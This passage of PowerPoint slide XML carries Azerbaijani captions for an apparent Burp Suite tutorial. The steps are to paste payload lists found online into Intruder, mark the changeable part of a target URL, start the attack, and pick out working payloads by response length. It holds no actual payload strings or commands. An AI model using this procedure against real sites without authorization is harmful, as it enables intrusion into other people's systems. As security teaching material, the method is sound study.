              <a:gd name="adj2" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent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3145734" name="Birbaşa Oxla Birləşdirici 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="537328" y="876693"/>
            <a:ext cx="329938" cy="659876"/>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048720" name="Mətn Qutusu 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311085" y="3044858"/>
            <a:ext cx="4826523" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shifə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ni yeniləyirik və bağlantı </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuitə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> gedir açılan shifəyə mausun sağ düyməsi ilə basırıq açılan menyuda</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send to İntruder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>düyməsinə basırıq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048721" name="Düzbucaqlı 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8154185" y="2026764"/>
            <a:ext cx="961535" cy="197962"/>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194" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="129014" y="187247"/>
            <a:ext cx="7699197" cy="6084672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048722" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908587" y="179941"/>
            <a:ext cx="4056434" cy="3075940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İnternetdən tapdığımız kodların hamısını seçib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kopyalayırıq</a:t>
            </a:r>
            <a:endParaRPr lang="az-Latn-AZ" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048723" name="Düzbucaqlı 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4046707" y="2937753"/>
            <a:ext cx="3696510" cy="29183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24" name="Düzbucaqlı 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4046707" y="4458921"/>
            <a:ext cx="3696510" cy="21035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97195" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9604219" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="accent2"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048725" name="Düzbucaqlı 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1585609" y="330740"/>
            <a:ext cx="535021" cy="19455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26" name="Düzbucaqlı 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1118681" y="671209"/>
            <a:ext cx="535021" cy="19455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27" name="Mətn Qutusu 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9465013" y="330740"/>
            <a:ext cx="2892357" cy="3202940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İntruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; Payloads</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bölməsinə giririk </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tapdığımız bütün </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> kodlarını </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Paste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> düyməsinə basaraq </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BurpSuitə</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yapışdırırıq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048728" name="Düzbucaqlı 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="243190" y="2461098"/>
            <a:ext cx="661481" cy="243191"/>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196" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="97276" y="0"/>
            <a:ext cx="9674253" cy="4280170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097197" name="Şəkil 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="97276" y="3674898"/>
            <a:ext cx="9693480" cy="3010161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="190500" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048729" name="Mətn Qutusu 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9756576" y="105336"/>
            <a:ext cx="2578096" cy="5806440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kodları </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yapışdırdırqan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sonra </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="az-Latn-AZ" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>İntruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt; Postions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bölməsinə giririk və hədəf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deyişiləcək</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hissəsini seçirik və  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bölməsindən hücumu başladırıq</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048730" name="Düzbucaqlı 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583660" y="4367719"/>
            <a:ext cx="632297" cy="11673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31" name="Düzbucaqlı 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515566" y="5243209"/>
            <a:ext cx="3210128" cy="19455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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3145735" name="Birbaşa Oxla Birləşdirici 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7548664" y="4717915"/>
            <a:ext cx="1498059" cy="836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198" name="Şəkil 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="7566567" cy="5482631"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048732" name="Mətn Qutusu 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7714034" y="272374"/>
            <a:ext cx="4396902" cy="6124754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Program işini tamamladıqdan sonra uğurlu olan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payloadları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tapmaq üçün </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bölməsindən istifadə edirik həmən bölmənin üzərinə basırıq və fərqli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bant genişliyi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>olan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payloadları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> qruplaşdırır eyni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ə malik olan kodlardan birini kopyalayıb hədəf shifəyə gedərək necə reaksiya verəcəyini yoxluyuruq.</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97199" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="296" t="-1" r="24422" b="66667"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="47630" y="87932"/>
            <a:ext cx="4828713" cy="1549533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2">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97200" name="Şəkil 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="293" r="25043" b="63508"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="47630" y="1735647"/>
            <a:ext cx="4828713" cy="1707028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2">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97201" name="Şəkil 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="25131" b="39481"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="47630" y="3672995"/>
            <a:ext cx="4847765" cy="2804403"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent5">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97202" name="Şəkil 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097165" y="175868"/>
            <a:ext cx="7094835" cy="1373663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2">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97203" name="Şəkil 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097165" y="1735647"/>
            <a:ext cx="7094835" cy="1707028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent2">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97204" name="Şəkil 14"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078112" y="3672996"/>
            <a:ext cx="7094836" cy="2804403"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent5">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097205" name="Şəkil 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="25131" b="39481"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="123343" y="229405"/>
            <a:ext cx="4847765" cy="2804403"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent5">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97206" name="Şəkil 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097164" y="229404"/>
            <a:ext cx="6971493" cy="2804403"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent5">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48733" name="Mətn Qutusu 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233464" y="3429000"/>
            <a:ext cx="11430000" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> yəni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bant genişliyi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1980</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> olan kodun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="az-Latn-AZ" sz="3600" dirty="0">
                <a:solidFill>
